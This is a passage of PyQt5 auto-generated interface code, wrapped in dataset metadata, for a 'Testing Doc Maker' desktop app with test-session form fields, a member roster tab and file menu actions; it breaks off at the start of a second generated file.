self.label_session_loc.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_session_loc.setFont(font)\n self.label_session_loc.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\n self.label_session_loc.setObjectName(\"label_session_loc\")\n self.form_left_general.setWidget(7, QtWidgets.QFormLayout.LabelRole, self.label_session_loc)\n self.layout_loc = QtWidgets.QVBoxLayout()\n self.layout_loc.setObjectName(\"layout_loc\")\n self.radio_loc_cage = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_loc_cage.sizePolicy().hasHeightForWidth())\n self.radio_loc_cage.setSizePolicy(sizePolicy)\n self.radio_loc_cage.setObjectName(\"radio_loc_cage\")\n self.radio_loc = QtWidgets.QButtonGroup(MainWindow)\n self.radio_loc.setObjectName(\"radio_loc\")\n self.radio_loc.addButton(self.radio_loc_cage)\n self.layout_loc.addWidget(self.radio_loc_cage)\n self.radio_loc_loading = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_loc_loading.sizePolicy().hasHeightForWidth())\n self.radio_loc_loading.setSizePolicy(sizePolicy)\n self.radio_loc_loading.setObjectName(\"radio_loc_loading\")\n self.radio_loc.addButton(self.radio_loc_loading)\n self.layout_loc.addWidget(self.radio_loc_loading)\n self.radio_loc_casino = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_loc_casino.sizePolicy().hasHeightForWidth())\n self.radio_loc_casino.setSizePolicy(sizePolicy)\n self.radio_loc_casino.setObjectName(\"radio_loc_casino\")\n self.radio_loc.addButton(self.radio_loc_casino)\n self.layout_loc.addWidget(self.radio_loc_casino)\n self.layout_loc_other = QtWidgets.QHBoxLayout()\n self.layout_loc_other.setObjectName(\"layout_loc_other\")\n self.radio_loc_other = QtWidgets.QRadioButton(self.fr_general_info)\n self.radio_loc_other.setText(\"\")\n self.radio_loc_other.setObjectName(\"radio_loc_other\")\n self.radio_loc.addButton(self.radio_loc_other)\n self.layout_loc_other.addWidget(self.radio_loc_other)\n self.edit_loc_other = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_loc_other.setEnabled(False)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_loc_other.sizePolicy().hasHeightForWidth())\n self.edit_loc_other.setSizePolicy(sizePolicy)\n self.edit_loc_other.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_loc_other.setStyleSheet(\"\")\n self.edit_loc_other.setText(\"\")\n self.edit_loc_other.setReadOnly(False)\n self.edit_loc_other.setClearButtonEnabled(True)\n self.edit_loc_other.setObjectName(\"edit_loc_other\")\n self.layout_loc_other.addWidget(self.edit_loc_other)\n self.layout_loc.addLayout(self.layout_loc_other)\n self.form_left_general.setLayout(7, QtWidgets.QFormLayout.FieldRole, self.layout_loc)\n self.date_session = QtWidgets.QDateEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.date_session.sizePolicy().hasHeightForWidth())\n self.date_session.setSizePolicy(sizePolicy)\n self.date_session.setCalendarPopup(True)\n self.date_session.setDate(QtCore.QDate(2019, 1, 31))\n self.date_session.setObjectName(\"date_session\")\n self.form_left_general.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.date_session)\n self.horizontalLayout_3.addLayout(self.form_left_general)\n self.form_right_general = QtWidgets.QFormLayout()\n self.form_right_general.setContentsMargins(-1, 5, -1, -1)\n self.form_right_general.setObjectName(\"form_right_general\")\n self.label_part = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_part.sizePolicy().hasHeightForWidth())\n self.label_part.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_part.setFont(font)\n self.label_part.setObjectName(\"label_part\")\n self.form_right_general.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_part)\n self.edit_part = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_part.setEnabled(True)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_part.sizePolicy().hasHeightForWidth())\n self.edit_part.setSizePolicy(sizePolicy)\n self.edit_part.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_part.setClearButtonEnabled(True)\n self.edit_part.setObjectName(\"edit_part\")\n self.form_right_general.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.edit_part)\n self.label_cat = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_cat.sizePolicy().hasHeightForWidth())\n self.label_cat.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_cat.setFont(font)\n self.label_cat.setObjectName(\"label_cat\")\n self.form_right_general.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_cat)\n self.edit_cat = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_cat.setEnabled(True)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_cat.sizePolicy().hasHeightForWidth())\n self.edit_cat.setSizePolicy(sizePolicy)\n self.edit_cat.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_cat.setClearButtonEnabled(True)\n self.edit_cat.setObjectName(\"edit_cat\")\n self.form_right_general.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.edit_cat)\n self.label_doc_num = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_doc_num.sizePolicy().hasHeightForWidth())\n self.label_doc_num.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_doc_num.setFont(font)\n self.label_doc_num.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\n self.label_doc_num.setObjectName(\"label_doc_num\")\n self.form_right_general.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_doc_num)\n self.layout_doc_num = QtWidgets.QVBoxLayout()\n self.layout_doc_num.setObjectName(\"layout_doc_num\")\n self.edit_doc_num = QtWidgets.QLineEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_doc_num.sizePolicy().hasHeightForWidth())\n self.edit_doc_num.setSizePolicy(sizePolicy)\n self.edit_doc_num.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_doc_num.setClearButtonEnabled(True)\n self.edit_doc_num.setObjectName(\"edit_doc_num\")\n self.layout_doc_num.addWidget(self.edit_doc_num)\n self.btn_get_num = QtWidgets.QPushButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_get_num.sizePolicy().hasHeightForWidth())\n self.btn_get_num.setSizePolicy(sizePolicy)\n self.btn_get_num.setObjectName(\"btn_get_num\")\n self.layout_doc_num.addWidget(self.btn_get_num)\n self.form_right_general.setLayout(2, QtWidgets.QFormLayout.FieldRole, self.layout_doc_num)\n self.label_desc = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_desc.sizePolicy().hasHeightForWidth())\n self.label_desc.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_desc.setFont(font)\n self.label_desc.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\n self.label_desc.setObjectName(\"label_desc\")\n self.form_right_general.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_desc)\n self.edit_desc = QtWidgets.QTextEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_desc.sizePolicy().hasHeightForWidth())\n self.edit_desc.setSizePolicy(sizePolicy)\n self.edit_desc.setMaximumSize(QtCore.QSize(135, 300))\n self.edit_desc.setObjectName(\"edit_desc\")\n self.form_right_general.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.edit_desc)\n self.btn_submit_form = QtWidgets.QPushButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_submit_form.sizePolicy().hasHeightForWidth())\n self.btn_submit_form.setSizePolicy(sizePolicy)\n self.btn_submit_form.setObjectName(\"btn_submit_form\")\n self.form_right_general.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.btn_submit_form)\n spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.form_right_general.setItem(4, QtWidgets.QFormLayout.FieldRole, spacerItem2)\n self.btn_export = QtWidgets.QPushButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_export.sizePolicy().hasHeightForWidth())\n self.btn_export.setSizePolicy(sizePolicy)\n self.btn_export.setObjectName(\"btn_export\")\n self.form_right_general.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.btn_export)\n self.horizontalLayout_3.addLayout(self.form_right_general)\n self.gridLayout_3.addWidget(self.fr_general_info, 3, 0, 1, 1)\n self.btn_import = QtWidgets.QPushButton(self.scroll_fields_contents)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_import.sizePolicy().hasHeightForWidth())\n self.btn_import.setSizePolicy(sizePolicy)\n self.btn_import.setObjectName(\"btn_import\")\n self.gridLayout_3.addWidget(self.btn_import, 2, 0, 1, 1)\n self.scroll_fields.setWidget(self.scroll_fields_contents)\n self.gridlayout.addWidget(self.scroll_fields, 3, 0, 1, 1)\n self.layout_document_settings = QtWidgets.QFormLayout()\n self.layout_document_settings.setObjectName(\"layout_document_settings\")\n self.btn_open_template = QtWidgets.QPushButton(self.tab_main)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_open_template.sizePolicy().hasHeightForWidth())\n self.btn_open_template.setSizePolicy(sizePolicy)\n self.btn_open_template.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_open_template.setObjectName(\"btn_open_template\")\n self.layout_document_settings.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.btn_open_template)\n self.file_path = QtWidgets.QLabel(self.tab_main)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.file_path.sizePolicy().hasHeightForWidth())\n self.file_path.setSizePolicy(sizePolicy)\n self.file_path.setObjectName(\"file_path\")\n self.layout_document_settings.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.file_path)\n self.btn_save_doc = QtWidgets.QPushButton(self.tab_main)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_save_doc.sizePolicy().hasHeightForWidth())\n self.btn_save_doc.setSizePolicy(sizePolicy)\n self.btn_save_doc.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_save_doc.setMaximumSize(QtCore.QSize(110, 16777215))\n self.btn_save_doc.setObjectName(\"btn_save_doc\")\n self.layout_document_settings.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.btn_save_doc)\n self.label_save_doc = QtWidgets.QLabel(self.tab_main)\n self.label_save_doc.setEnabled(True)\n self.label_save_doc.setObjectName(\"label_save_doc\")\n self.layout_document_settings.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.label_save_doc)\n self.gridlayout.addLayout(self.layout_document_settings, 1, 0, 1, 1)\n self.main_tabs.addTab(self.tab_main, \"\")\n self.tab_roster = QtWidgets.QWidget()\n self.tab_roster.setObjectName(\"tab_roster\")\n self.gridLayout_2 = QtWidgets.QGridLayout(self.tab_roster)\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.formLayout = QtWidgets.QFormLayout()\n self.formLayout.setObjectName(\"formLayout\")\n self.btn_open_roster = QtWidgets.QPushButton(self.tab_roster)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_open_roster.sizePolicy().hasHeightForWidth())\n self.btn_open_roster.setSizePolicy(sizePolicy)\n self.btn_open_roster.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_open_roster.setObjectName(\"btn_open_roster\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.btn_open_roster)\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n self.btn_close_roster = QtWidgets.QPushButton(self.tab_roster)\n self.btn_close_roster.setEnabled(False)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_close_roster.sizePolicy().hasHeightForWidth())\n self.btn_close_roster.setSizePolicy(sizePolicy)\n self.btn_close_roster.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_close_roster.setObjectName(\"btn_close_roster\")\n self.horizontalLayout_4.addWidget(self.btn_close_roster)\n self.btn_save_roster = QtWidgets.QPushButton(self.tab_roster)\n self.btn_save_roster.setEnabled(False)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_save_roster.sizePolicy().hasHeightForWidth())\n self.btn_save_roster.setSizePolicy(sizePolicy)\n self.btn_save_roster.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_save_roster.setObjectName(\"btn_save_roster\")\n self.horizontalLayout_4.addWidget(self.btn_save_roster)\n self.label_roster = QtWidgets.QLabel(self.tab_roster)\n self.label_roster.setObjectName(\"label_roster\")\n self.horizontalLayout_4.addWidget(self.label_roster)\n self.formLayout.setLayout(0, QtWidgets.QFormLayout.FieldRole, self.horizontalLayout_4)\n self.btn_create_roster = QtWidgets.QPushButton(self.tab_roster)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_create_roster.sizePolicy().hasHeightForWidth())\n self.btn_create_roster.setSizePolicy(sizePolicy)\n self.btn_create_roster.setMinimumSize(QtCore.QSize(110, 0))\n self.btn_create_roster.setObjectName(\"btn_create_roster\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.btn_create_roster)\n self.label_create_roster = QtWidgets.QLabel(self.tab_roster)\n self.label_create_roster.setObjectName(\"label_create_roster\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.label_create_roster)\n self.gridLayout_2.addLayout(self.formLayout, 0, 0, 1, 1)\n self.tree_roster = QtWidgets.QTreeWidget(self.tab_roster)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.tree_roster.sizePolicy().hasHeightForWidth())\n self.tree_roster.setSizePolicy(sizePolicy)\n self.tree_roster.setMinimumSize(QtCore.QSize(0, 0))\n self.tree_roster.setAlternatingRowColors(True)\n self.tree_roster.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n self.tree_roster.setObjectName(\"tree_roster\")\n self.tree_roster.headerItem().setTextAlignment(0, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(1, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(2, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(3, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(4, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(5, QtCore.Qt.AlignCenter)\n self.tree_roster.headerItem().setTextAlignment(6, QtCore.Qt.AlignCenter)\n self.tree_roster.header().setCascadingSectionResizes(True)\n self.tree_roster.header().setDefaultSectionSize(90)\n self.tree_roster.header().setHighlightSections(False)\n self.gridLayout_2.addWidget(self.tree_roster, 1, 0, 1, 1)\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.btn_add_member = QtWidgets.QPushButton(self.tab_roster)\n self.btn_add_member.setEnabled(False)\n self.btn_add_member.setObjectName(\"btn_add_member\")\n self.horizontalLayout.addWidget(self.btn_add_member)\n self.btn_modify_member = QtWidgets.QPushButton(self.tab_roster)\n self.btn_modify_member.setEnabled(False)\n self.btn_modify_member.setObjectName(\"btn_modify_member\")\n self.horizontalLayout.addWidget(self.btn_modify_member)\n self.btn_remove_member = QtWidgets.QPushButton(self.tab_roster)\n self.btn_remove_member.setEnabled(False)\n self.btn_remove_member.setObjectName(\"btn_remove_member\")\n self.horizontalLayout.addWidget(self.btn_remove_member)\n self.gridLayout_2.addLayout(self.horizontalLayout, 2, 0, 1, 1)\n self.main_tabs.addTab(self.tab_roster, \"\")\n self.gridLayout.addWidget(self.main_tabs, 0, 0, 1, 1)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 690, 21))\n self.menubar.setObjectName(\"menubar\")\n self.menuFile = QtWidgets.QMenu(self.menubar)\n self.menuFile.setObjectName(\"menuFile\")\n MainWindow.setMenuBar(self.menubar)\n self.statusBar = QtWidgets.QStatusBar(MainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n MainWindow.setStatusBar(self.statusBar)\n self.actionOpen_Template_File = QtWidgets.QAction(MainWindow)\n self.actionOpen_Template_File.setObjectName(\"actionOpen_Template_File\")\n self.actionSave_Testing_Doc = QtWidgets.QAction(MainWindow)\n self.actionSave_Testing_Doc.setObjectName(\"actionSave_Testing_Doc\")\n self.menuFile.addAction(self.actionOpen_Template_File)\n self.menuFile.addAction(self.actionSave_Testing_Doc)\n self.menubar.addAction(self.menuFile.menuAction())\n\n self.retranslateUi(MainWindow)\n self.main_tabs.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n MainWindow.setTabOrder(self.edit_requestor, self.edit_lead)\n MainWindow.setTabOrder(self.edit_lead, self.btn_modify_attending)\n MainWindow.setTabOrder(self.btn_modify_attending, self.date_session)\n MainWindow.setTabOrder(self.date_session, self.time_start)\n MainWindow.setTabOrder(self.time_start, self.time_end)\n MainWindow.setTabOrder(self.time_end, self.radio_dyno)\n MainWindow.setTabOrder(self.radio_dyno, self.radio_track)\n MainWindow.setTabOrder(self.radio_track, self.radio_type_other)\n MainWindow.setTabOrder(self.radio_type_other, self.edit_type_other)\n MainWindow.setTabOrder(self.edit_type_other, self.radio_loc_cage)\n MainWindow.setTabOrder(self.radio_loc_cage, self.radio_loc_loading)\n MainWindow.setTabOrder(self.radio_loc_loading, self.radio_loc_casino)\n MainWindow.setTabOrder(self.radio_loc_casino, self.radio_loc_other)\n MainWindow.setTabOrder(self.radio_loc_other, self.edit_loc_other)\n MainWindow.setTabOrder(self.edit_loc_other, self.edit_part)\n MainWindow.setTabOrder(self.edit_part, self.edit_cat)\n MainWindow.setTabOrder(self.edit_cat, self.edit_doc_num)\n MainWindow.setTabOrder(self.edit_doc_num, self.btn_get_num)\n MainWindow.setTabOrder(self.btn_get_num, self.edit_desc)\n MainWindow.setTabOrder(self.edit_desc, self.btn_export)\n MainWindow.setTabOrder(self.btn_export, self.btn_submit_form)\n MainWindow.setTabOrder(self.btn_submit_form, self.main_tabs)\n MainWindow.setTabOrder(self.main_tabs, self.scroll_fields)\n MainWindow.setTabOrder(self.scroll_fields, self.btn_import)\n MainWindow.setTabOrder(self.btn_import, self.btn_open_template)\n MainWindow.setTabOrder(self.btn_open_template, self.btn_save_doc)\n MainWindow.setTabOrder(self.btn_save_doc, self.btn_open_roster)\n MainWindow.setTabOrder(self.btn_open_roster, self.btn_close_roster)\n MainWindow.setTabOrder(self.btn_close_roster, self.btn_save_roster)\n MainWindow.setTabOrder(self.btn_save_roster, self.btn_create_roster)\n MainWindow.setTabOrder(self.btn_create_roster, self.tree_roster)\n MainWindow.setTabOrder(self.tree_roster, self.btn_add_member)\n MainWindow.setTabOrder(self.btn_add_member, self.btn_modify_member)\n MainWindow.setTabOrder(self.btn_modify_member, self.btn_remove_member)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Testing Doc Maker\"))\n self.label_general.setText(_translate(\"MainWindow\", \"General Info\"))\n self.label_requestor.setText(_translate(\"MainWindow\", \"Name of requestor:\"))\n self.label_lead.setText(_translate(\"MainWindow\", \"Test Lead:\"))\n self.label_attendee.setText(_translate(\"MainWindow\", \"Attendee List:\"))\n self.btn_modify_attending.setText(_translate(\"MainWindow\", \"Modify List\"))\n self.label_session_date.setText(_translate(\"MainWindow\", \"Test Session Date:\"))\n self.label_session_st.setText(_translate(\"MainWindow\", \"Start Time:\"))\n self.label_session_et.setText(_translate(\"MainWindow\", \"End Time:\"))\n self.label_testing_type.setText(_translate(\"MainWindow\", \"Testing Type:\"))\n self.radio_dyno.setText(_translate(\"MainWindow\", \"Dyno\"))\n self.radio_track.setText(_translate(\"MainWindow\", \"Track\"))\n self.edit_type_other.setPlaceholderText(_translate(\"MainWindow\", \"Other\"))\n self.label_session_loc.setText(_translate(\"MainWindow\", \"Testing Location:\"))\n self.radio_loc_cage.setText(_translate(\"MainWindow\", \"Cage\"))\n self.radio_loc_loading.setText(_translate(\"MainWindow\", \"Loading Dock\"))\n self.radio_loc_casino.setText(_translate(\"MainWindow\", \"Casino\"))\n self.edit_loc_other.setPlaceholderText(_translate(\"MainWindow\", \"Other\"))\n self.date_session.setDisplayFormat(_translate(\"MainWindow\", \"yyyy-dd-MM\"))\n self.label_part.setText(_translate(\"MainWindow\", \"Part Being Tested:\"))\n self.edit_part.setPlaceholderText(_translate(\"MainWindow\", \"CFR19\"))\n self.label_cat.setText(_translate(\"MainWindow\", \"Testing Category\"))\n self.edit_cat.setPlaceholderText(_translate(\"MainWindow\", \"Testing\"))\n self.label_doc_num.setText(_translate(\"MainWindow\", \"Testing Doc Number:\"))\n self.edit_doc_num.setPlaceholderText(_translate(\"MainWindow\", \"10997\"))\n self.btn_get_num.setText(_translate(\"MainWindow\", \"Autofill Number\"))\n self.label_desc.setText(_translate(\"MainWindow\", \"Description:\"))\n self.edit_desc.setPlaceholderText(_translate(\"MainWindow\", \"Testing\"))\n self.btn_submit_form.setText(_translate(\"MainWindow\", \"Submit Form\"))\n self.btn_export.setText(_translate(\"MainWindow\", \"Export As Template\"))\n self.btn_import.setText(_translate(\"MainWindow\", \"Import Template\"))\n self.btn_open_template.setText(_translate(\"MainWindow\", \"Choose Template File\"))\n self.file_path.setText(_translate(\"MainWindow\", \"No document chosen.\"))\n self.btn_save_doc.setText(_translate(\"MainWindow\", \"Save Testing Doc\"))\n self.label_save_doc.setText(_translate(\"MainWindow\", \"Document not saved.\"))\n self.main_tabs.setTabText(self.main_tabs.indexOf(self.tab_main), _translate(\"MainWindow\", \"Main Page\"))\n self.btn_open_roster.setText(_translate(\"MainWindow\", \"Choose Roster File\"))\n self.btn_close_roster.setText(_translate(\"MainWindow\", \"Close Roster File\"))\n self.btn_save_roster.setText(_translate(\"MainWindow\", \"Save Roster File\"))\n self.label_roster.setText(_translate(\"MainWindow\", \"No roster file chosen.\"))\n self.btn_create_roster.setText(_translate(\"MainWindow\", \"Create Roster File\"))\n self.label_create_roster.setText(_translate(\"MainWindow\", \"Roster File not created.\"))\n self.tree_roster.setSortingEnabled(True)\n self.tree_roster.headerItem().setText(0, _translate(\"MainWindow\", \"Member ID\"))\n self.tree_roster.headerItem().setText(1, _translate(\"MainWindow\", \"First Name\"))\n self.tree_roster.headerItem().setText(2, _translate(\"MainWindow\", \"Last Name\"))\n self.tree_roster.headerItem().setText(3, _translate(\"MainWindow\", \"Cell #\"))\n self.tree_roster.headerItem().setText(4, _translate(\"MainWindow\", \"Waiver Signed\"))\n self.tree_roster.headerItem().setText(5, _translate(\"MainWindow\", \"Truck Cert\"))\n self.tree_roster.headerItem().setText(6, _translate(\"MainWindow\", \"Trailer Cert\"))\n self.btn_add_member.setText(_translate(\"MainWindow\", \"Add Member\"))\n self.btn_modify_member.setText(_translate(\"MainWindow\", \"Modify Member\"))\n self.btn_remove_member.setText(_translate(\"MainWindow\", \"Remove Member(s)\"))\n self.main_tabs.setTabText(self.main_tabs.indexOf(self.tab_roster), _translate(\"MainWindow\", \"Roster Management\"))\n self.menuFile.setTitle(_translate(\"MainWindow\", \"File\"))\n self.actionOpen_Template_File.setText(_translate(\"MainWindow\", \"Open Template File\"))\n self.actionOpen_Template_File.setShortcut(_translate(\"MainWindow\", \"Ctrl+O\"))\n self.actionSave_Testing_Doc.setText(_translate(\"MainWindow\", \"Save Testing Doc\"))\n self.actionSave_Testing_Doc.setShortcut(_translate(\"MainWindow\", \"Ctrl+S\"))\n\n" }, { "alpha_fraction": 0.6995456218719482, "alphanum_fraction": 0.7199923992156982, "avg_line_length": 57.67777633666992, "blob_id": "e2d0f5d3b70102806ddbd54c5cadc118505733af", "content_id": "aceb711bce3af986cc23c9a13909d1277b192792", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5282, "license_type": "no_license", "max_line_length": 114, "num_lines": 90, "path": "/windows/attendee.py", "repo_name": "concordia-fsae/testing_doc_maker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file '.\\windows\\attendee_export.ui'\n#\n# Created by: PyQt5 UI code generator 5.11.3\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_attendee_list(object):\n def 